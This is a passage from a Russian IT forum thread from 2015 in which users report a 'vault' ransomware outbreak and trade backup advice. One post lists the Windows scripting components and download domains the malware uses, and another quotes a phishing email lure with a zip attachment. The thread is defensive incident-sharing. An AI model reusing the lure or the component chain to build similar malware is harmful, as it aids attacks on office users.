когда пострадали от этого , первое что сделал - сменил расширения архивов копий на что то не относящееся к тому что шифрует. Пока по сигнатуре они типы данных не отличают. Единственное что помогло это ежедневный бэкап , а критичные данные - например ТиС - каждые 3 часа. Копии лучше отправлять на локальный ФТП , т.к. расшаренные папки он то же все зашифровал.
|
|||
146
zak555
13.03.15
✎
09:04
|
(144) сейчас все авнтивири не умеют ловить вирей, которые использовали методы 90х....
немного модифицируем способ "старины" и вот тебе "стелс" =) |
|||
147
IVT_2009
13.03.15
✎
09:05
|
Вменяемого лекарства от этого зла пока нет. Некоторые антивирусы пытаются отловить активность потоков шифрования , но думаю это пока не то. Только бэкап , ибо дисковое пространство не стоит ничего сейчас.
|
|||
148
aka AMIGO
13.03.15
✎
09:06
|
(146) а ты с авирой распрощался?
|
|||
149
zak555
13.03.15
✎
09:06
|
(148) давно, как-то только он в первые пропустила вирь
|
|||
150
zak555
13.03.15
✎
09:07
|
(147) вменяемое лекарство -- штатная видовая защита -- запретить всё, разрешить определённые действия
|
|||
151
aka AMIGO
13.03.15
✎
09:12
|
(149) хм.. вот-же зараза..
у меня MSE, так надеялся я на него, а он тупо промолчал.. Заразился мой офисный комп.. Был отруган, комп заменили, в правах урезалиии.. :) Правда, 50х50, что привнесен не мной, найден еще один комп с вирями у бушки.. вирь дописывал второе расширение к файлам *xls.чтототам.. |
|||
152
zak555
13.03.15
✎
09:13
|
(151) он ещё файлы *.1cd шифрует =)
|
|||
153
vde69
13.03.15
✎
09:15
|
у нас был vault
кому интересно - на момент бяки ни один антивирус его не ловил, проверял на ноде, вебе, каспере, аве |
|||
154
vde69
13.03.15
✎
09:16
|
(153) хотя по инету прощло как минимум 2 недели после его появления....
|
|||
155
aka AMIGO
13.03.15
✎
09:17
|
(152) - до меня этот шифровальщик, видимо, не добрался, всё на компе было в ажуре.. Кроме как на мисте в ветках пара слов заменялась рекламой..
А вот на сетевых хардах я увидел первым, админы аж застонали :) (153) точно! именно это расширение. |
|||
156
aka AMIGO
13.03.15
✎
09:19
|
+155 CureiT тоже не видит..
|
|||
157
vde69
13.03.15
✎
09:21
|
конкретно его можно бороть по
Использует встроеные в виндовс компоненты a. ADODB.Stream b. Scripting.FileSystemObject c. MSXML2.XMLHTTP d. WScript.Shell Использует сетевые имена http://download-attach.com и псевдо ссылку ТОР вида http://ххххххххх.city но в следующей вариации будет другое... |
|||
158
ololoraise
13.03.15
✎
09:26
|
(157) еще использует http://bryaknut.ru/
|
|||
159
vde69
13.03.15
✎
09:32
|
кстати учитывая необходимость (при использования веб клиента 1с) не самых безопасных настроек приходится выбирать либе 1с илбо защита :)
|
|||
160
zak555
13.03.15
✎
09:37
|
(159) а какое дело до клиента вэб вирусу ?
|
|||
161
vde69
13.03.15
✎
09:44
|
(160) если установить настройки которые будут блокировать скрипты, то веб клиент 1с не будет работать...
|
|||
162
zak555
13.03.15
✎
09:46
|
(161) главное, чтобы с базой ничего не случилось =)
|
|||
163
Лефмихалыч
13.03.15
✎
10:00
|
(0) варианта два:
1. Все переносить к херам в облака, УСБ-дупла замазать цементом, пользователь с данными общается через вебсервисы и прочие прокладкопрослойки с тонкого бездискового клиента 2. Если пользователь работает на рабочей станции, то есть - данные хранятся у него, то бэкапы и версионирование - онле. Все, на что у пользователя есть права изменить на рабочей станции, будет зашифровано. Помешать этому вариантов нет, если троян сумел запуститься под правами юзера. |
|||
164
DrZombi
гуру
13.03.15
✎
10:08
|
(163) Облако не понацея. Сегодня это облако есть, а завтра его нет. По тем же политическим соображениям :)
|
|||
165
Лефмихалыч
13.03.15
✎
10:11
|
(164) я говорил про СВОЁ облако, а не всякое там маилру и прочий гуглдрайв
|
|||
166
Гёдза
13.03.15
✎
10:16
|
(161) Для сайта с 1с можно разрешение поставить
|
|||
167
DrZombi
гуру
13.03.15
✎
10:23
|
(165) К примеру, на каком софте?
|
|||
168
Лефмихалыч
13.03.15
✎
10:28
|
(167) забавный вопрос
|
|||
169
oslokot
13.03.15
✎
10:29
|
(0) Бэкапы.
Рядом с серверами поставить ящик с фряхой, поднять на ней ФТП и сливать туда данные каждую ночь. Профит. |
|||
170
Torquader
13.03.15
✎
13:27
|
Есть ещё такой "фокус" - называется "одноразовый диск".
Если в правах пользователя запретить "удаление" и "создание папок/дозапись данных", то получается директория, в который пользователь может создать файл, но не может его перезаписать - и файл остаётся навсегда. |
|||
171
Torquader
13.03.15
✎
13:29
|
(170) Только "фокус" с Word-ом не работает - он при записи несколько раз файл перезаписывает - будь он не ладен.
|
|||
172
Противный
16.03.15
✎
10:51
|
Ни кому свежачка не отправить?
Вложение суровое на 155 кБ... =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= От: алеша новиков <[email protected]> Кому: Написано: 16 марта 2015 г., 16:00:35 Тема: Я нашел, фотки, эти фотоки только для тебя Файлы: Darja5_VK.zip --====----====----====----====----====----====----====----====----====----===-- Прет алеша, вчера наткнулся на фотки с встречи выпускников приколись, лично я по ржал прикрепленный файл все в нем =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= |
|||
173
ДенисЧ
16.03.15
✎
10:54
|
(172) А... Так вот что мне сегодня с утра пытались впарить про фотки с корпоратива )))
|
|||
174
kumena
17.03.15
✎
20:54
|
>> Грамотно организованное резервирование и архивирование - ответ на 80% админских вопросов
Где можно почитать/посмотреть про грамотное архивирование? и конкретная ситуация - домашний комп 1сника, есть личные личные папки есть рабочие. бекапить каждый день все - никакого места не хватит надолго, соответственно, нужно сделать основной бекап, а потом изменения. есть такой софт под win 8.1? можно пойти по более простому пути, забекапить вручную те папки, что не меняются (или очень редко меняются), и написать скрипт для бекапа тех папко что меняются часто или очень важные. |
|||
175
Torquader
17.03.15
✎
20:56
|
(174) А стандартный виндовый разностный BackUp разве не годится ?
|
|||
176
kumena
17.03.15
✎
21:03
|
ща попробую освоить
|
|||
177
kumena
17.03.15
✎
21:11
|
(175) похоже что не годится.
там бекапиться системный раздел, а мне систему вообще бекапить не надо, главное данные чтобы были целы, а они на других логических дисках. причем бекапить надо выборочно. если я чего не понял, прошу объяснить и поэтому вопрос о проге с накопительными бекапами открытый. |
|||
178
kumena
17.03.15
✎
21:13
|
похоже что придется изучать это
https://technet.microsoft.com/en-us/library/cc733145(v=ws.10).aspx |
|||
179
kumena
17.03.15
✎
21:43
|
оказывается есть и GUI к этой штуке
https://technet.microsoft.com/ru-ru/magazine/2009.04.utilityspotlight(en-us).aspx а интересно, кто как бекапы дома делает? |
|||
180
GreyK
17.03.15
✎
21:47
|
(179) У меня два бекапа, оба уже отдельно живут... Научить делать?
|
|||
181
kumena
17.03.15
✎
22:05
|
(180) расскажи, вдруг мысли интересные будут.
вообще, большая куча бекапов тоже не нужна, в них только путаться будешь. а оптимальность в этом деле у каждого своя будет. |
|||
182
GreyK
17.03.15
✎
22:25
|
(181) Сохранять всё не получится ни когда. Архиваторы то-же пишут архивы с вирусами, поэтому надо понимать что действительно нужно сохранить и что потерять не страшно.
Для 1Ски хватает регулярного создания архивных копий, для любителей MS-овских документов хватает копий в облаке или на паре флэшек раз месяц (ценность сих тварений понимают все), фотки свадьбы и пр. "важных событий" в хранении не нуждаются, если нуждаются, то пишутся на СД или ДВД и ложатся в несгораемый сейф. Про детей не буду :) |
|||
183
Torquader
17.03.15
✎
22:29
|
(182) Ну, то что пишется на DVD через несколько лет может просто не прочитаться.
Но, хранить фотографии на рабочем компьютере вообще как-то не очень логично. |
|||
184
Провинциальный 1сник
18.03.15
✎
07:26
|
(181) Как уже тут было говорено, оптимальный бэкап в данном случае - версионное хранилище с доступом к предыдущим версиям "только чтение".
|
|||
185
kumena
18.03.15
✎
16:21
|
>> Как уже тут было говорено, оптимальный бэкап в данном случае - версионное хранилище с доступом к предыдущим версиям "только чтение".
я и не спорю с этим утверждением, вопрос какая программа его умеет делать? |
|||
186
bse
18.03.15
✎
16:33
|
(185) Можно https://lightbackup.com/ попробовать. А доступ на чтение правами разрулить...
|
|||
187
ДенисЧ
18.03.15
✎
16:34
|
(185) Программа секретная, не всем доступная.
Называется "грамотный сисадмин". Стоит дорого. На халяву, увы, не скачать |
|||
188
Torquader
18.03.15
✎
16:41
|
(187) На самом деле, некоторые пытаются получить если не на халяву, то за тарелку супа.
Но, как показывает результат, не всё, что называется гордым именем "системный администратор" оказывается им на практике со всеми вытекающими (и, скорее, падающими) последствиями. Поэтому, стоит несколько раз подумать над тем, а нужна ли нам такая экономия. Конечно, иногда бывает "трагическое стечения обстоятельств", когда и грамотный сисадмин мало чем может помочь, но чем более продуманно сделана защита и чем чаще делается резервное копирование, тем меньше последствий может иметь инцидент. P.S. иногда и уборщица способна сделать из сервера никому не нужную железную коробочку. |
|||
189
ДенисЧ
18.03.15
✎
16:43
|
(188) ключевое слово "грамотный"...
|
|||
190
Torquader
18.03.15
✎
17:25
|
(189) Проверить грамотность администратора может только другой более грамотный администратор, так что "не всем доступно" - это очень даже отражает суть вещей.
|
|||
191
Zamestas
18.03.15
✎
17:29
|
(163) +1 - все остальное не работает.
|
|||
192
DJ Anthon
18.03.15
✎
19:37
|
а что, если кто-нибудь заморочится с контролем обработки файлов? ну, потеряем пару десятков файлов в начале диска. будет висеть мониторчик вместо каспера. сложно такой написать? думаю вот такой написать после перезда в другой город, когда на фикси перейду, а то заепся немного с беготней по клиентам
|
|||
193
DJ Anthon
25.03.15
✎
16:11
|
ну вот. и мы тоже. прислали с проверенного ящика. созвонились с ними, у них все заражено, но они всех типа предупредить не успели. письмо выглядело как типа счет на оплату в архиве, а в архиве js
в другой организации пришел ехешник, каспер его перехватил |
|||
194
sergey198
25.03.15
✎
16:13
|
(193) сегодня также в одной организации словили, но 1с он не зашифровал (хранится на отдельном фтп), а вот документы некоторые шифранул
|
|||
195
Провинциальный 1сник
25.03.15
✎
16:35
|
Теневое копирование рулит.. зря все-таки нет распределенной технологии теневого копирования.. размеры жестких дисков вполне позволяют сиё
|
|||
196
DJ Anthon
25.03.15
✎
17:00
|
(194) он и у нас 1С не тронул, все доки в основном кореловские и автокадовские, пострадали только мелкософтовские, но все равно их много.
(195) там все забито было, не успел за бэкапы взяться, бухия (после переноса) просто не отпускает. хорошо хоть 1С не йопнулась. |
|||
197
DJ Anthon
26.03.15
✎
09:26
|
а нет, 1Ску лопатит как миленькую. хорошо, что бэкапы сделали успели. он где-то прочно прописался, надо сносить все нафик
|
|||
198
ssamm
26.03.15
✎
09:30
|
Тоже вчера словили, также (js в архиве) якобы акт сверки. Благо бэкапы были...
|
|||
199
DJ Anthon
05.04.15
✎
16:13
|
а если архивы/бэкапы переименовывать в exe?
|
|||
200
ifso
05.04.15
✎
17:55
|
(199) угу, "и чтоб никто не догадался" складывать в папку windows )
|
|||
201
Klesk666
05.04.15
✎
18:03
|
(0) выделенный sql сервер уже предлагали?
|
|||
202
Klesk666
05.04.15
✎
18:05
|
сорри, невнимательно читал, терминал поможет
|
|||
203
solver it
05.04.15
✎
18:44
|
(107) Резервные копии? Ну ну...
Вы хоть раз видели как работают шифровальщики? Если их конечно не полные дауны делали. Они же не за 2 сек после заражения все шифруют. На это надо время. Они длительное время сидят в системе и прозрачно шифруют данные. В результате, даже в резервных копиях сидят зашифрованные данные. Для бизнеса потеря данных данных за последний месяц, зачастую тоже самое что потерять все. |
Форум | Правила | Описание | Объявления | Секции | Поиск | Книга знаний | Вики-миста |